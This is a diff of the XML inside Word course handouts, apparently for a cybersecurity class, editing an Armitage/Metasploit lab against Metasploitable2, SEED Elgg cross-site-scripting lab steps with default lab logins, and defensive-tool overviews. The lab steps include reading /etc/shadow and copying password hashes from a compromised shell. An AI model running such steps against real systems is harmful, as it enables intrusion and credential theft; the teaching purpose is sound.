         <w:t xml:space="preserve">. </w:t>
       </w:r>
       <w:r>
-        <w:t>Otherwise, you have to install Armitage on Kali</w:t>
+        <w:t xml:space="preserve">Otherwise, you </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>have to</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> install Armitage on Kali</w:t>
       </w:r>
       <w:r>
         <w:t>-</w:t>
@@ -2597,9 +2841,11 @@
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>armitage</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2660,8 +2906,13 @@
       <w:r>
         <w:t>-&gt;</w:t>
       </w:r>
-      <w:r>
-        <w:t>NMap Scan</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>NMap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Scan</w:t>
       </w:r>
       <w:r>
         <w:t>=&gt;</w:t>
@@ -2729,6 +2980,9 @@
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> you will see the IP address of Metasploitable2 on a box and popup to Attack it.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Next,</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> Right</w:t>
@@ -2805,8 +3059,29 @@
       <w:r>
         <w:t xml:space="preserve">If the scan stops, </w:t>
       </w:r>
-      <w:r>
-        <w:t>Go into /usr/share/metasploit-framework/modules</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Go</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> into /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/share/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>metasploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>-framework/modules</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> folder and delete that particular module </w:t>
@@ -2836,7 +3111,13 @@
         <w:t xml:space="preserve"> complete.</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> The box representing the target machine will now have lightning symbols around it showing vulnerabilities are found.</w:t>
+        <w:t xml:space="preserve"> The box representing the target machine will now have lightning symbols around it</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> showing vulnerabilities are found.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2866,13 +3147,7 @@
         <w:t>-</w:t>
       </w:r>
       <w:r>
-        <w:t>click on the box. Select "Shell1</w:t>
-      </w:r>
-      <w:r>
-        <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">" and the "interact". You will land on a $ prompt. That's the command prompt of </w:t>
+        <w:t xml:space="preserve">click on the box. Select "Shell1" and the "interact". You will land on a $ prompt. That's the command prompt of </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">the </w:t>
@@ -2891,12 +3166,14 @@
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>w</w:t>
       </w:r>
       <w:r>
         <w:t>hoami</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2910,8 +3187,13 @@
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
       </w:pPr>
-      <w:r>
-        <w:t>ip address</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> address</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3025,7 +3307,15 @@
         <w:pStyle w:val="ListParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">cat /etc/shadow </w:t>
+        <w:t>cat /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">/shadow </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3049,7 +3339,13 @@
         <w:t xml:space="preserve">a </w:t>
       </w:r>
       <w:r>
-        <w:t>colon. Copy the user id and hashed password for "</w:t>
+        <w:t xml:space="preserve">colon. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>For example, c</w:t>
+      </w:r>
+      <w:r>
+        <w:t>opy the user id and hashed password for "</w:t>
       </w:r>
       <w:r>
         <w:t>service</w:t>
@@ -3139,6 +3435,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Well, we just found a back door in case the front door closes.</w:t>
       </w:r>
     </w:p>
@@ -3151,7 +3448,6 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>Lets' try this backdoor now.</w:t>
       </w:r>
     </w:p>
@@ -3176,10 +3472,22 @@
         <w:t xml:space="preserve">the </w:t>
       </w:r>
       <w:r>
-        <w:t>Metasploitable2 icon on Armitage and select "login" and then "telnet"</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">. Enter </w:t>
+        <w:t>Metasploitable2 icon on Armitage and select "login</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t>" and then "telnet"</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Next, e</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">nter </w:t>
       </w:r>
       <w:r>
         <w:t>"</w:t>
@@ -3285,12 +3593,14 @@
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>w</w:t>
       </w:r>
       <w:r>
         <w:t>hoami</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3416,7 +3726,13 @@
         <w:t xml:space="preserve">the </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">search option. You can do the same thing with a MAC machine, </w:t>
+        <w:t>search option. You can do the same thing with a MAC machine</w:t>
+      </w:r>
+      <w:r>
+        <w:t>;</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:t>c</w:t>
@@ -3498,12 +3814,14 @@
         </w:rPr>
         <w:t xml:space="preserve">Public </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
         </w:rPr>
         <w:t>WiFi</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:r>
@@ -3513,10 +3831,26 @@
         <w:t>ny</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> public WiFi. </w:t>
-      </w:r>
-      <w:r>
-        <w:t>If you are on public WiFi, u</w:t>
+        <w:t xml:space="preserve"> public </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>WiFi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">If you are on public </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>WiFi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>, u</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">se </w:t>
@@ -3531,7 +3865,15 @@
         <w:t xml:space="preserve">tunnel </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">like TunnelBear (free) before </w:t>
+        <w:t xml:space="preserve">like </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>TunnelBear</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> (free) before </w:t>
       </w:r>
       <w:r>
         <w:t>using it for anything</w:t>
@@ -3630,7 +3972,13 @@
         <w:t>strict</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> privacy policy by default. Please change the default security setting of all software that you use</w:t>
+        <w:t xml:space="preserve"> privacy policy by default. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Therefore, p</w:t>
+      </w:r>
+      <w:r>
+        <w:t>lease change the default security setting of all software you use</w:t>
       </w:r>
       <w:r>
         <w:t>,</w:t>
@@ -3723,7 +4071,13 @@
         <w:t>is feature</w:t>
       </w:r>
       <w:r>
-        <w:t>. Always remember convenience is the enemy of security. Keeping your car key in the car is very convenient</w:t>
+        <w:t xml:space="preserve">. Always remember convenience is the enemy of security. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>For example, k</w:t>
+      </w:r>
+      <w:r>
+        <w:t>eeping your car key in the car is very convenient</w:t>
       </w:r>
       <w:r>
         <w:t>,</w:t>
@@ -3829,7 +4183,13 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Use 2-factor authentication whenever possible. This will force you to login using your password and your phone/email. This increases your defense by many factors.</w:t>
+        <w:t>Use 2-factor authentication whenever possible. This will force you to log</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>in using your password and your phone/email. This increases your defense by many factors.</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> This is inconvenient even for you, therefore, much more secure.</w:t>
@@ -3883,7 +4243,7 @@
         <w:t>'</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">t want another site to be compromised because you were lazy enough to use the same password </w:t>
+        <w:t xml:space="preserve">t want another site to be compromised because you were lazy to use the same password </w:t>
       </w:r>
       <w:r>
         <w:t>o</w:t>
@@ -3936,8 +4296,13 @@
       <w:r>
         <w:t xml:space="preserve">. </w:t>
       </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Dashlane, 1Password, </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Dashlane</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, 1Password, </w:t>
       </w:r>
       <w:r>
         <w:t>LastPass</w:t>
@@ -4062,25 +4427,33 @@
     <w:p>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>Tools like McAfee Anti-virus software</w:t>
-      </w:r>
-      <w:r>
-        <w:t>s</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">Tools like McAfee Anti-virus software </w:t>
       </w:r>
       <w:r>
         <w:t>are</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> installed in all servers and workstations to stop malware from attacking machines. These tools receive </w:t>
+        <w:t xml:space="preserve"> installed in all servers and workstations to stop malware from attacking machines. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>In addition, t</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">hese tools receive </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">a </w:t>
       </w:r>
       <w:r>
-        <w:t>frequent update on the list of malware and their protective mechanism</w:t>
+        <w:t xml:space="preserve">frequent update on the list of </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>malware</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> and their protective mechanism</w:t>
       </w:r>
       <w:r>
         <w:t>s</w:t>
@@ -4128,7 +4501,13 @@
         <w:t>vulnerabilities</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">. Tools like IBM BigFix allows </w:t>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>In addition, t</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ools like IBM BigFix allows </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">a </w:t>
@@ -4140,7 +4519,15 @@
         <w:t xml:space="preserve"> and servers</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> up-to-date with patches and upgrades.</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>up-to-date</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> with patches and upgrades.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4167,7 +4554,7 @@
         <w:t xml:space="preserve"> world. Companies use tools to quarantine emails to block such attempts. Proofpoint Protection Server is </w:t>
       </w:r>
       <w:r>
-        <w:t>a tool that monitors incoming emails and filters them, and presents</w:t>
+        <w:t>a tool that monitors incoming emails and filters them and presents</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> block reports to the users.</w:t>
@@ -4239,19 +4626,43 @@
         <w:t xml:space="preserve">the </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">company's web infrastructure and render cached contents to the browser whenever available. If the content is not already cached, the software will fetch the content, cache it and then </w:t>
+        <w:t xml:space="preserve">company's web infrastructure and render cached contents to the browser whenever available. If the content is not already cached, the software will fetch </w:t>
+      </w:r>
+      <w:r>
+        <w:t>i</w:t>
+      </w:r>
+      <w:r>
+        <w:t>t, cache it</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, and</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:t>yield</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> to the browser. This way, the </w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">it </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">to the browser. This way, the </w:t>
       </w:r>
       <w:r>
         <w:t>subsequen</w:t>
       </w:r>
       <w:r>
-        <w:t>t request will be served from the cache. Of course, this mechanism does not help if the content changes on every request, but it works for a large portion of the website. Akamai is a well-known content caching software that is widely used for this type of caching. Akamai has distribute</w:t>
+        <w:t>t request will be served from the cache. Of course, this mechanism does not help if the content changes on every request, but it works for a large portion of the website. Akamai is a well-known content caching software that is widely used for this type of caching.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> In addition,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Akamai has distribute</w:t>
       </w:r>
       <w:r>
         <w:t>d</w:t>
@@ -4356,7 +4767,21 @@
         <w:t xml:space="preserve">the </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">content. Forward proxy protects clients from malleolus or undesirable contents. Zscaler Cloud Firewall is a popular browser proxy that handles SSL inspection.  </w:t>
+        <w:t xml:space="preserve">content. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Thus, f</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">orward proxy protects clients from malleolus or undesirable contents. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Zscaler</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Cloud Firewall is a popular browser proxy that handles SSL inspection.  </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4367,7 +4792,13 @@
         <w:t>them</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> off to a server. Reverse proxy protects servers from cyber-attacks. With multiple web servers in place, a load balancer is enough. When you have only one server, a reverse proxy makes sense to secure the webserver. NGINX</w:t>
+        <w:t xml:space="preserve"> off to a server. Reverse proxy protects servers from cyber-attacks. With multiple web servers in place, a load balancer is enough. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>However, w</w:t>
+      </w:r>
+      <w:r>
+        <w:t>hen you have only one server, a reverse proxy makes sense to secure the webserver. NGINX</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
@@ -4375,12 +4806,14 @@
       <w:r>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t xml:space="preserve">pronounced </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> Engine</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -4415,7 +4848,13 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">As discussed earlier </w:t>
+        <w:t>As discussed earlier</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:t>f</w:t>
@@ -4499,7 +4938,13 @@
         <w:t>typical</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> firewalls serve as a safety gate by blocking IPs/ports. A WAF can stop denial o</w:t>
+        <w:t xml:space="preserve"> firewalls serve as a safety gate by blocking IPs/ports. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>In addition, a</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> WAF can stop denial o</w:t>
       </w:r>
       <w:r>
         <w:t>f</w:t>
@@ -4511,13 +4956,19 @@
         <w:t>s</w:t>
       </w:r>
       <w:r>
-        <w:t>, can block users of specific geographic area</w:t>
+        <w:t>, block users of specific geographic area</w:t>
       </w:r>
       <w:r>
         <w:t>s,</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> and many other things using </w:t>
+        <w:t xml:space="preserve"> and </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">do </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">many other things using </w:t>
       </w:r>
       <w:r>
         <w:t>sophisticated</w:t>
@@ -4564,13 +5015,24 @@
         <w:t>Search engines deploy good bot</w:t>
       </w:r>
       <w:r>
-        <w:t>s like google, bing</w:t>
-      </w:r>
+        <w:t xml:space="preserve">s like google, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>bing</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>,</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> etc. to crawl your site and index your pages for search results. </w:t>
+        <w:t xml:space="preserve"> etc.</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> to crawl your site and index your pages for search results. </w:t>
       </w:r>
       <w:r>
         <w:t>The hackers deploy bad bot</w:t>
@@ -4613,28 +5075,25 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Vulnerabilities of servers and networks pop up regularly. Companies need </w:t>
+        <w:t xml:space="preserve">Vulnerabilities of servers and networks pop up regularly. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>As a result, c</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ompanies need </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">a </w:t>
       </w:r>
       <w:r>
-        <w:t>tool to discover them, prioritize them and finally confirm that exposure has been remediated. Nexpose, Rapid7</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>are examples of some</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> vulnerability management software</w:t>
-      </w:r>
-      <w:r>
-        <w:t>s</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> that monitor exposures in real-time and adapt to new threats with fresh data, ensuring you companies always act before the impact.</w:t>
+        <w:t>tool to discover them, prioritize them and finally confirm that exposure has been remediated. Nexpose</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> and Rapid7 are examples of some vulnerability management software that monitor exposures in real-time and adapt to new threats with fresh data, ensuring that</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> companies always act before the impact.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4694,7 +5153,13 @@
         <w:t>s</w:t>
       </w:r>
       <w:r>
-        <w:t>. It then blocks bad bots and allows the rest. Distil Networks is such a BOT management software.</w:t>
+        <w:t>. It then blocks bad bots and allows the rest. Disti</w:t>
+      </w:r>
+      <w:r>
+        <w:t>l</w:t>
+      </w:r>
+      <w:r>
+        <w:t>l Networks is such a BOT management software.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4754,7 +5219,15 @@
         <w:t>ystem's security</w:t>
       </w:r>
       <w:r>
-        <w:t>. Netragard is a popular pen</w:t>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Netragard</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> is a popular pen</w:t>
       </w:r>
       <w:r>
         <w:t>-</w:t>
@@ -4848,7 +5321,23 @@
     <w:p>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>A honeypot is a computer intended to mimic likely targets of cyberattacks. It can be used to detect attacks or deflect them from a legitimate target. It can also be used to gain information about how cybercriminals operate. ThreadStrike from Attivo is a tool to set</w:t>
+        <w:t xml:space="preserve">A honeypot is a computer intended to mimic likely targets of cyberattacks. It can be used to detect attacks or deflect them from a legitimate target. It can also be used to gain information about how cybercriminals operate. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ThreadStrike</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> from </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Attivo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> is a tool to set</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>

--- a/CD_Session4.docx
+++ b/CD_Session4.docx
@@ -7,9 +7,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="0" w:name="_Hlk22738194"/>
-      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
       <w:bookmarkEnd w:id="0"/>
-      <w:bookmarkEnd w:id="1"/>
       <w:r>
         <w:t>Introduction to</w:t>
       </w:r>
@@ -1408,6 +1406,17 @@
         <w:t>Log in as admin</w:t>
       </w:r>
       <w:r>
+        <w:t xml:space="preserve"> (admin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>seedelgg</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
         <w:t xml:space="preserve"> and</w:t>
       </w:r>
     </w:p>
@@ -1438,6 +1447,9 @@
         <w:t xml:space="preserve"> description field of any user</w:t>
       </w:r>
       <w:r>
+        <w:t xml:space="preserve"> (let’s say Alice)</w:t>
+      </w:r>
+      <w:r>
         <w:t>:</w:t>
       </w:r>
     </w:p>
@@ -1467,7 +1479,41 @@
         <w:t xml:space="preserve">Now, </w:t>
       </w:r>
       <w:r>
-        <w:t>all users viewing that profile</w:t>
+        <w:t>all users</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (let</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">’s say </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>samy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>seedsamy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> viewing th</w:t>
+      </w:r>
+      <w:r>
+        <w:t>e</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> profile</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> of Alice</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> or listing that profile</w:t>
@@ -1510,7 +1556,29 @@
         <w:t xml:space="preserve">Enter the following </w:t>
       </w:r>
       <w:r>
-        <w:t>snippet in the brief description field of any other user:</w:t>
+        <w:t>snippet in the brief description field of any other user</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (let’s say </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>boby</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>seedboby</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:t>:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1568,7 +1636,21 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Enter the following snippet in the brief description field of any other user:</w:t>
+        <w:t>Enter the following snippet in the brief description field of any other user</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (let’s say Charlie/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>seedcharlie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:t>:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1900,6 +1982,7 @@
         <w:pStyle w:val="CSBody"/>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>&lt;/head&gt;</w:t>
       </w:r>
     </w:p>
@@ -1908,7 +1991,6 @@
         <w:pStyle w:val="CSBody"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>&lt;body&gt;</w:t>
       </w:r>
     </w:p>
@@ -2238,6 +2320,25 @@
         <w:t>Login as Alice</w:t>
       </w:r>
       <w:r>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>alice</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>seedalice</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
         <w:t>, go to edit mode of the profile</w:t>
       </w:r>
       <w:r>
@@ -2285,6 +2386,7 @@
         <w:ind w:firstLine="360"/>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Alice just got a big salary increase!</w:t>
       </w:r>
     </w:p>
@@ -2298,7 +2400,6 @@
       </w:pPr>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>Boby</w:t>
       </w:r>
       <w:r>
@@ -2309,7 +2410,13 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> salary is currently 50,000</w:t>
+        <w:t xml:space="preserve"> salary is currently </w:t>
+      </w:r>
+      <w:r>
+        <w:t>30</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,000</w:t>
       </w:r>
       <w:r>
         <w:t>,</w:t>
@@ -2356,7 +2463,13 @@
         <w:t xml:space="preserve"> salary is now $</w:t>
       </w:r>
       <w:r>
-        <w:t>1 less, 49,999.</w:t>
+        <w:t xml:space="preserve">1 less, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:t>9,999.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2828,7 +2941,15 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">On </w:t>
+        <w:t>S</w:t>
+      </w:r>
+      <w:r>
+        <w:t>tart Kali Linux, on</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="1"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">the </w:t>
@@ -5987,7 +6108,7 @@
             </wp:anchor>
           </w:drawing>
         </mc:Choice>
-        <mc:Fallback xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
